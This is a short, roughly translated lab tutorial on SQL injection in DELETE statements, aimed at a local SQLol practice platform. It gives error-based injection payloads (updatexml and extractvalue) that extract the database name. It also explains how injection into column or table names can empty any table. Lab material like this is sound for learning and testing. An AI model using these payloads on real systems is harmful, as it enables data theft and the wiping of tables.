Access the Delete module on the home page, http://127.0.0.1/sql/delete.php, and start testing the Delete module.
Delete syntax:
DELETE from "Users" WHERE "username" = "' 1 '"
There may be injections in several locations, only one is shown here.
The following shows the methods injected into different locations.
One, String in WHERE clause
To construct a POC:
' or Updatexml (1,concat (0x7e, (Database ()), 0x7e), 0) or '
Get database
Second, Integer in WHERE clause
To construct a POC:
"Or Extractvalue (1,concat (0x7e,database ())) or"
Get database
Third, Column Name
Injection point at "1"
DELETE from Users WHERE "1" = 1
How to use:
1. Clear the Users table
2. Construct Error Injection statement
Iv. Table Name
Injection point at "1"
DELETE from 1 WHERE isadmin = 0
How to use:
1. Empty any table
2, construction error, burst data
SQL injection test Platform Sqlol-5.delete injection test